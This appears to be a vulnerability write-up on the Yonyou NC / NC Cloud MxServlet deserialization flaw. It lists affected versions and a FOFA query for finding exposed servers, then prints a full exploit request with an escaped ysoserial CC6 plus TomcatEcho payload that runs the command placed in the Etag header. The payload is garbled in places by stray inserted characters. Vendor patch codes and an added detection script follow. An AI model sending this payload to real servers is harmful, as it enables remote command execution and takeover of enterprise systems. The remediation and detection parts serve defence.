0x01 Product overview
Yonyou NC (用友NC) is an enterprise-grade ERP suite. As an information-management platform it provides a set of business modules, including financial accounting, procurement, sales, materials management, production planning and human resources, to support digital transformation and efficient management in enterprises.
0x02 Vulnerability overview
Yonyou NC and NC Cloud contain a deserialization vulnerability: the system deserializes user-supplied serialized data directly, without filtering it first. Combined with the deserialization gadget chains already present on the system's own classpath, this yields command execution, and further exploitation gives arbitrary control of the server.
0x03 Affected versions
NC56, NC57, NC63, NC65, NCC1903, NCC1909, NCC2005
0x04 Reproduction environment
FOFA: body="Client/Uclient/UClient.dmg"
0x05 Vulnerability reproduction
Exp:
POST /servlet/~ic/nc.bs.framework.mx.MxServlet HTTP/1.1
Host: your-ip
Etag: whoami
{{unquote("xacxedx00x05srx00x11java.util.HashSetxbaDx85x95x96xb8xb74x03x00x00xpwx0cx00x00x00x02?@x00x00x00x00x00x01srx004org.apache.commons.collections.keyvalue.TiedMapEntryx8axadxd2x9b9xc1x1fxdbx02x00x02Lx00x03keytx00x12Ljava/lang/Object;Lx00x03maptx00x0fLjava/util/Map;xptx00x04su18srx00*org.apache.commons.collections.map.LazyMapnxe5x94x82x9eyx10x94x03x00x01Lx00x07factorytx00,Lorg/apache/commons/collections/Transformer;xpsrx00:org.apache.commons.collections.functors.ChainedTransformer0xc7x97xecx28zx97x04x02x00x01[x00x0diTransformerstx00-[Lorg/apache/commons/collections/Transformer;xpurx00-[Lorg.apache.commons.collections.Transformer;xbdV*xf1xd84x18x99x02x00x00xpx00x00x00x06srx00;org.apache.commons.collections.functors.ConstantTransformerXvx90x11Ax02xb1x94x02x00x01Lx00x09iConstantqx00~x00x03xpvrx00*org.mozilla.javascript.DefiningClassLoaderx00x00x00x00x00x00x00x00x00x00x00xpsrx00:org.apache.commons.collections.functors.InvokerTransformerx87x服务器托管网e8xffkx7b|xce8x02x00x03[x00x05iArgstx00x13[Ljava/lang/Object;Lx00x0biMethodNametx00x12Ljava/lang/String;[x00x0biParamTypestx00x12[Ljava/lang/Class;xpurx00x13[Ljava.lang.Object;x90xceXx9fx10sx29lx02x00x00xpx00x00x00x01urx00x12[Ljava.lang.Class;xabx16xd7xaexcbxcdZx99x02x00x00xpx00x00x00x00tx00x0egetConstructoruqx00~x00x1ax00x00x00x01vqx00~x00x1asqx00~x00x13uqx00~x00x18x00x00x00x01uqx00~x00x18x00x00x00x00tx00x0bnewInstanceuqx00~x00x1ax00x00x00x01vqx00~x00x18sqx00~x00x13uqx00~x00x18x00x00x00x02tx00%org.apache.logging.util.crypt.NoCrypturx00x02[Bxacxf3x17xf8x06x08Txe0x02x00x00xpx00x00x0fxe2xcaxfexbaxbex00x00x002x00xe3x01x00%org/apache/logging/util/crypt/NoCryptx07x00x01x01x00x10java/lang/Objectx07x00x03x01x00x06x01x00x03x28x29Vx01x00x04Codex01x00x0fLineNumberTablex0cx00x05x00x06x0ax00x04x00x09x01x00x01qx01x003x28Ljava/lang/String;x29Ljava/io/ByteArrayOutputStream;x01x00x07execCmdx0cx00x0dx00x0cx0ax00x02x00x0ex01x00x08x01x00x1ejava/lang/NoSuchFieldExceptionx07x00x11x01x00x1fjava/lang/NoSuchMethodExceptionx07x00x13x01x00x13java/la
ng/Exceptionx07x00x15x01x00x15java/lang/ThreadGroupx07x00x17x01x00x15java/lang/ClassLoaderx07x00x19x01x00x17java/lang/reflect/Fieldx07x00x1bx01x00x13[Ljava/lang/Thread;x07x00x1dx01x00x10java/lang/Threadx07x00x1fx01x00x10java/lang/Stringx07x00!x01x00x0ejava/util/Listx07x00#x01x00x1djava/io/ByteArrayOutputStreamx07x00%x01x00x0dStackMapTablex01x00x0dcurrentThreadx01x00x14x28x29Ljava/lang/Thread;x0cx00x28x00x29x0ax00 x00*x01x00x0egetThreadGroupx01x00x19x28x29Ljava/lang/ThreadGroup;x0cx00,x00-x0ax00 x00.x01x00x15getContextClassLoaderx01x00x19x28x29Ljava/lang/ClassLoader;x0cx000x001x0ax00 x002x01x00x08getClassx01x00x13x28x29Ljava/lang/Class;x0cx004x005x0ax00x04x006x01x00x07threadsx08x008x01x00x0fjava/lang/Classx07x00:x01x00x10getDeclaredFieldx01x00-x28Ljava/lang/String;x29Ljava/lang/reflect/Field;x0cx00x01x00x0dsetAccessiblex01x00x04x28Zx29Vx0cx00@x00Ax0ax00x1cx00Bx01x00x03getx01x00&x28Ljava/lang/Object;x29Ljava/lang/Object;x0cx00Dx00Ex0ax00x1cx00Fx01x00x07getNamex01x00x14x28x29Ljava/lang/String;x0cx00Hx00Ix0ax00 
x00Jx01x00x04execx08x00Lx01x00x08containsx01x00x1bx28Ljava/lang/CharSequence;x29Zx0cx00Nx00Ox0ax00"x00Px01x00x04httpx08x00Rx01x00x06targetx08x00Tx01x00x12java/lang/Runnablex07x00Vx01x00x06this$0x08x00Xx01x00x07handlerx08x00Zx01x00x0dgetSuperclassx0cx00x005x0ax00;x00]x01x00x06globalx08x00_x01x00x0aprocessorsx08x00ax01x00x04sizex01x00x03x28x29Ix0cx00cx00dx0bx00$x00ex01x00x15x28Ix29Ljava/lang/Object;x0cx00Dx00gx0bx00$x00hx01x00x03reqx08x00jx01x00x0bgetResponsex08x00lx01x00x09getMethodx01x00@x28Ljava/lang/String;[Ljava/lang/Class;x29Ljava/lang/reflect/Method;x0cx00nx00ox0ax00;x00px01x00x18java/lang/reflect/Methodx07x00rx01x00x06invokex01x009x28Ljava/lang/Object;[Ljava/lang/Object;x29Ljava/lang/Object;x0cx00tx00ux0ax00sx00vx01x00x09getHeaderx08x00xx01x00x0aCMD_HEADERx01x00x12Ljava/lang/String;x0cx00zx00x7bx09x00x02x00|x01x00x07isEmptyx01x00x03x28x29Zx0cx00~x00x7fx0ax00"x00x80x01x00x09setStatusx08x00x82x01x00x11java/lang/Integerx07x00x84x01x00x04TYPEx01x00x11Ljava/lang/Class;x0cx00x86x00x87x09x00x85x00x88x01x00x04x28Ix29Vx0cx00x05x00x8ax0ax00x85x00x8bx0cx00x0bx00x0cx0ax00x02x00x8dx01x00$org.apache.tomcat.util.buf.ByteChunkx08x00x8fx01x00x07forNamex01x00=x28Ljava/lang/String;ZLjava/lang/ClassLoader;x29Ljava/lang/Class;x0cx00x91x00x92x0ax00;x00x93x01x00x0bnewInstancex01x00x14x28x29Ljava/lang/Object;x0cx00x95x00x96x0ax00;x00x97x01x00x08setBytesx08x00x99x01x00x02[Bx07x00x9bx01x00x11getDeclaredMethodx0cx00x9dx00ox0ax00;x00x9ex01x00x0btoByteArrayx01x00x04x28x29[Bx0cx00xa0x00xa1x0ax00&x00xa2x01x00x07valueOfx01x00x16x28Ix29Ljava/lang/Integer;x0cx00xa4x00xa5x0ax00x85x00xa6x01x00x07doWritex08x00xa8x01x00x13java.nio.ByteBufferx08x00xaax01x00x04wrapx08x00xacx01x00x13[Ljava/lang/String;x07x00xaex01x00x13java/io/InputStreamx07x00xb0x01x00x07os.namex08x00xb2x01x00x10java/lang/Systemx07x00xb4x01x00x0bgetPropertyx01x00&x28Ljava/lang/String;x29Ljava/lang/String;x0cx00xb6x00xb7x0ax00xb5x00xb8x01x00x0btoLowerCasex0cx00xbax00Ix0ax00"x00xbbx01x00x03winx08x00xbdx01x00x03cmdx08x00xbfx01x00x02/cx
08x00xc1x01x00x09/bin/bashx08x00xc3x01x00x02-cx08x00xc5x01x00x11java/lang/Runtimex07x00xc7x01x00x0agetRuntimex01x00x15x28x29Ljava/lang/Runtime;x0cx00xc9x00xcax0ax00xc8x00xcbx01x00x28x28[Ljava/lang/String;x29Ljava/lang/Process;x0cx00Lx00xcdx0ax00xc8x00xcex01x00x11java/lang/Processx07x00xd0x01x00x0egetInputStreamx01x00x17x28x29Ljava/io/InputStream;x0cx00xd2x00xd3x0ax00xd1x00xd4x0ax00&x00x09x01x00x05writex01x00x07x28[BIIx29Vx0cx00xd7x00xd8x0ax00&x00xd9x01x00x04readx01x00x05x28[Bx29Ix0cx00xdbx00xdcx0ax00xb1x00xddx01x00x0aSourceFilex01x00x0fTomcatEcho.javax01x00x04Etagx08x00xe1x00!x00x02x00x04x00x00x00x01x00x09x00zx00x7bx00x00x00x04x00x01x00x05x00x06x00x01x00x07x00x00x00x1dx00x01x00x01x00x00x00x05*xb7x00x0axb1x00x00x00x01x00x08x00x00x00x06x00x01x00x00x00x06x00x09x00x0bx00x0cx00x01x00x07x00x00x00x11x00x01x00x01x00x00x00x05*xb8x00x0fxb0x00x00x00x00x00x08x00x10x00x06x00x01x00x07x00x00x04xb4x00x08x00x11x00x00x02xbcx12xe2xb3x00x7dx03;xb8x00+xb6x00/Lxb8x00+xb6x003M+xb6x007x129xb6x00?N-x04xb6x00C-+xb6x00Gxc0x00x1exc0x00x1e:x04x036x05x15x05x19x04xbexa2x02~x19x04x15x052:x06x19x06xc7x00x06xa7x02ix19x06xb6x00K:x07x19x07x12Mxb6x00Qx9ax00x0dx19x07x12Sxb6x00Qx9ax00x06xa7x02Kx19x06xb6x007x12Uxb6x00?N-x04xb6x00C-x19x06xb6x00G:x08x19x08xc1x00Wx9ax00x06xa7x02x28x19x08xb6x007x12Yxb6x00?N-x04xb6x00C-x19x08xb6x00G:x08x19x08xb6x007x12[xb6x00?Nxa7x00x16:x09x19x08xb6x007xb6x00^xb6x00^x12[xb6x00?N-x04xb6x00C-x19x08xb6x00G:x08x19x08xb6x007xb6x00^x12`xb6x00?Nxa7x00x10:x09x19x08xb6x007x12`xb6x00?N-x04xb6x00C-x19x08xb6x00G:x08x19x08xb6x007x12bxb6x00?N-x04xb6x00C-x19x08xb6x00Gxc0x00$xc0x00$:x09x036x0ax15x0ax19x09xb9x00fx01x00xa2x01~x19x09x15x0axb9x00ix02x00:x0bx19x0bxb6x007x12kxb6x00?N-服务器托管网x04xb6x00C-x19x0bxb6x00G:x0cx19x0cxb6x007x12mx03xbdx00;xb6x00qx19x0cx03xbdx00x04xb6x00w:x0dx19x0cxb6x007x12yx04xbdx00;Yx03x12"Sxb6x00qx19x0cx04xbdx00x04Yx03xb2x00x7dSxb6x00wxc0x00":x07x19x07xc6x01x09x19x07xb6x00x81x9ax01x01x19x0dxb6x007x12x83x04xbdx00;Yx03xb2x00x89Sxb6x00qx19x0dx04xbdx00x04Yx03xbbx00x85Yx11x00xc8
xb7x00x8cSxb6x00wWx19x07xb8x00x8e:x0ex12x90x03,xb8x00x94:x0fx19x0fxb6x00x98:x08x19x0fx12x9ax06xbdx00;Yx03x12x9cSYx04xb2x00x89SYx05xb2x00x89Sxb6x00x9fx19x08x06xbdx00x04Yx03x19x0exb6x00xa3SYx04xbbx00x85Yx03xb7x00x8cSYx05x19x0exb6x00xa3xbexb8x00xa7Sxb6x00wWx19x0dxb6x007x12xa9x04xbdx00;Yx03x19x0fSxb6x00qx19x0dx04xbdx00x04Yx03x19x08Sxb6x00wWxa7x00S:x0fx12xabx03,xb8x00x94:x10x19x10x12xadx04xbdx00;Yx03x12x9cSxb6x00x9fx19x10x04xbdx00x04Yx03x19x0exb6x00xa3Sxb6x00w:x08x19x0dxb6x007x12xa9x04xbdx00;Yx03x19x10Sxb6x00qx19x0dx04xbdx00x04Yx03x19x08Sxb6x00wWx04;x1ax99x00x06xa7x00x09x84x0ax01xa7xfe|x1ax99x00x06xa7x00x0exa7x00x05:x06x84x05x01xa7xfdx80xa7x00x04Kxb1x00x08x00xa4x00xafx00xb2x00x12x00xd2x00xe0x00xe3x00x12x01xccx02Cx02Fx00x14x00x00x05x00x0cx00x07x00x0dx00x0ex00x0ex00x15x00x0fx00x1fx00x10x00$x00x11x001x00x12x00x02Cx00Cx02Fx00?x02Hx00@x02Qx00Ax02tx00Bx02x96x00Dx02x98x00Fx02x9fx000x02xa5x00Hx02xacx00Jx02xafx00Ix02xb1x00x12x02xb7x00Nx02xbax00Mx02xbbx00Ox00'x00x00x00xa6x00x15xffx004x00x06x01x07x00x18x07x00x1ax07x00x1cx07x00x1ex01x00x00xfcx00x16x07x00 xfcx00x1ax07x00"x02xfcx00"x07x00x04ex07x00x12x12]x07x00x12x0cxfdx00-x07x00$x01xffx01'x00x0fx01x07x00x18x07x00x1ax07x00x1cx07x00x1ex01x07x00 x07x00"x07x00x04x07x00$x01x07x00x04x07x00x04x07x00x04x07x00&x00x01x07x00x14xfcx00Ox07x00x04xf9x00x01x06xf8x00x05x06xffx00x02x00x06x01x07x00x18x07x00x1ax07x00x1cx07x00x1ex01x00x01x07x00x16xfcx00x01x07x00x04xfax00x05xffx00x02x00x00x00x01x07x00x16x00x00x09x00x0dx00x0cx00x01x00x07x00x00x00xe2x00x04x00x07x00x00x00x8c*x01xa5x00x0a*xb6x00x81x99x00x06xa7x00vx01Lx12xb3xb8x00xb9xb6x00xbcx12xbexb6x00Qx99x00x19x06xbdx00"Yx03x12xc0SYx04x12xc2SYx05*SLxa7x00x16x06xbdx00"Yx03x12xc4SYx04x12xc6SYx05*SLxb8x00xcc+xb6x00xcfxb6x00xd5Mxbbx00&Yxb7x00xd6Nx036x04x11x04x00xbcx08:x05xa7x00x0c-x19x05x03x15x04xb6x00xda,x19x05xb6x00xdeY6x04x02xa0xffxed-xb0xa7x00x08:x06xa7x00x03x01xb0x00x01x00x00x00x82x00x85x00x16x00x01x00'x00x00x00
PS: ysoserial's CC6 chain combined with the TomcatEcho echo chain; the serialized data is converted with yakit's built-in strconv.Unquote.
0x06 Remediation
Apply the corresponding patch and restart the service. The patches for each version are obtained as follows:
NC56 fix
Patch name: NC56mxservlet反序列化补丁 (NC56 MxServlet deserialization patch)
Patch code: NCM_NC5.6_000_1008_20221215_GP__PGM_098441263
NC57 fix
Patch name: 57mxservlet反序列化补丁 (NC57 MxServlet deserialization patch)
Patch code: NCM_NC5.7_000_109902_20220412_GP__PGM_757354084
NC63 fix
Patch name: 63mxservlet反序列化补丁 (NC63 MxServlet deserialization patch)
Patch code: NCM_NC6.3_000_109902_20220412_GP__PGM_76074944
NC65 fix
Patch name: 65mxservlet反序列化补丁 (NC65 MxServlet deserialization patch)
Patch code: NCM_NC6.5_000_109902_20220412_GP__PGM_762735076
NCC1903 fix
Patch name: 1903mxservlet反序列化补丁 (NCC1903 MxServlet deserialization patch)
Patch code: NCM_NCCLOUD1903_10_109902_20220412_GP__PGM_773746473
NCC1909 fix
Patch name: 1909mxservlet反序列化补丁 (NCC1909 MxServlet deserialization patch)
Patch code: NCM_NCCLOUD1909_10_109902_20220412_GP__PGM_774732239
NCC2005 fix
Patch name: MxServlet反序列化命令执行 (MxServlet deserialization command execution)
Patch code: SUPPORT-NCCloud2020.05-Patch-20211102-299966
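From the defender's side, the request above has three recognisable traits: it is sent to the MxServlet path, its body is a Java serialization stream (it opens with the AC ED 00 05 stream header), and the class names of the commons-collections gadget chain (TiedMapEntry, LazyMap, ChainedTransformer, ConstantTransformer, InvokerTransformer) appear in clear text inside that stream, while the command travels in an Etag request header, which is normally only a response header. The following detector is an added example for this write-up, not code from the original post or from the vendor; it applies those checks to raw HTTP requests so unfiltered deserialization attempts against the endpoint (the weakness described in 0x02) can be flagged in captured traffic. All sample requests in it are constructed, and the "attack" body is a non-functional fragment containing only the stream header and class names.

```python
"""Detect Java deserialization attempts against the MxServlet endpoint.

Added example for this write-up (not code from the original post or from the
vendor). It scans raw HTTP requests for the Java serialization stream header
(AC ED 00 05), for class names of the commons-collections gadget chain carried
by the payload in the write-up, and for the unusual Etag request header that
the echo chain reads its command from. All sample requests are constructed.
"""
from dataclasses import dataclass, field

JAVA_STREAM_MAGIC = b"\xac\xed\x00\x05"          # STREAM_MAGIC + STREAM_VERSION
VULNERABLE_PATH = "/servlet/~ic/nc.bs.framework.mx.MxServlet"
GADGET_CLASSES = (                               # classes named in the payload above
    b"org.apache.commons.collections.keyvalue.TiedMapEntry",
    b"org.apache.commons.collections.map.LazyMap",
    b"org.apache.commons.collections.functors.ChainedTransformer",
    b"org.apache.commons.collections.functors.ConstantTransformer",
    b"org.apache.commons.collections.functors.InvokerTransformer",
)
# ETag is a response header; on a request it is odd, and the TomcatEcho class in
# the payload reads its command from exactly that header (CMD_HEADER = "Etag").
ODD_REQUEST_HEADERS = ("etag",)


@dataclass
class Finding:
    path: str
    reasons: list = field(default_factory=list)
    severity: str = "none"        # none | low | medium | high


def parse_request(raw: bytes):
    """Split a raw HTTP/1.1 request into (path, lower-cased headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line, *header_lines = head.split(b"\r\n")
    _method, path, _version = request_line.split(b" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    return path.decode("latin-1"), headers, body


def inspect_request(raw: bytes) -> Finding:
    """Score one request. Gadget class names inside a serialized stream are decisive;
    a serialized stream on the endpoint by itself may still be legitimate client traffic."""
    path, headers, body = parse_request(raw)
    finding = Finding(path=path)
    on_endpoint = path.startswith(VULNERABLE_PATH)
    has_magic = JAVA_STREAM_MAGIC in body
    gadgets = [c.decode() for c in GADGET_CLASSES if c in body]
    odd_headers = [h for h in ODD_REQUEST_HEADERS if h in headers]

    if on_endpoint:
        finding.reasons.append("targets the MxServlet deserialization endpoint")
    if has_magic:
        finding.reasons.append("body contains a Java serialization stream (AC ED 00 05)")
    finding.reasons += [f"body names gadget class {g}" for g in gadgets]
    finding.reasons += [f"unexpected request header {h!r}" for h in odd_headers]

    if has_magic and gadgets:
        finding.severity = "high"
    elif has_magic and (on_endpoint or odd_headers):
        finding.severity = "medium"
    elif has_magic or on_endpoint:
        finding.severity = "low"
    return finding


# Constructed sample traffic (not real captures). The "attack" body is only the
# stream header followed by class names, so the detector has something to match;
# it is not a working serialized object graph.
ATTACK_REQUEST = (
    b"POST /servlet/~ic/nc.bs.framework.mx.MxServlet HTTP/1.1\r\n"
    b"Host: nc.example.internal\r\n"
    b"Etag: whoami\r\n"
    b"Content-Type: application/octet-stream\r\n"
    b"\r\n"
    + JAVA_STREAM_MAGIC
    + b"sr\x00\x11java.util.HashSet..."
    + b"sr\x004org.apache.commons.collections.keyvalue.TiedMapEntry..."
    + b"sr\x00*org.apache.commons.collections.map.LazyMap..."
    + b"sr\x00:org.apache.commons.collections.functors.InvokerTransformer..."
)
SERIALIZED_NO_GADGET = (
    b"POST /servlet/~ic/nc.bs.framework.mx.MxServlet HTTP/1.1\r\n"
    b"Host: nc.example.internal\r\n"
    b"\r\n"
    + JAVA_STREAM_MAGIC
    + b"sr\x00\x10java.lang.String..."
)
BENIGN_REQUEST = (
    b"POST /api/login HTTP/1.1\r\n"
    b"Host: nc.example.internal\r\n"
    b"Content-Type: application/json\r\n"
    b"\r\n"
    b'{"user":"alice"}'
)

if __name__ == "__main__":
    for name, req in (("attack", ATTACK_REQUEST), ("serialized", SERIALIZED_NO_GADGET),
                      ("benign", BENIGN_REQUEST)):
        f = inspect_request(req)
        print(f"{name:10s} {f.severity:6s} {f.path} {f.reasons}")
```

The severity split is deliberate: the endpoint may receive legitimate serialized client traffic, so a stream header alone is only worth a look, whereas commons-collections gadget class names inside a stream sent to it are a strong indicator. Detection of this kind is a stopgap for monitoring; the durable fix is the vendor patch listed under 0x06.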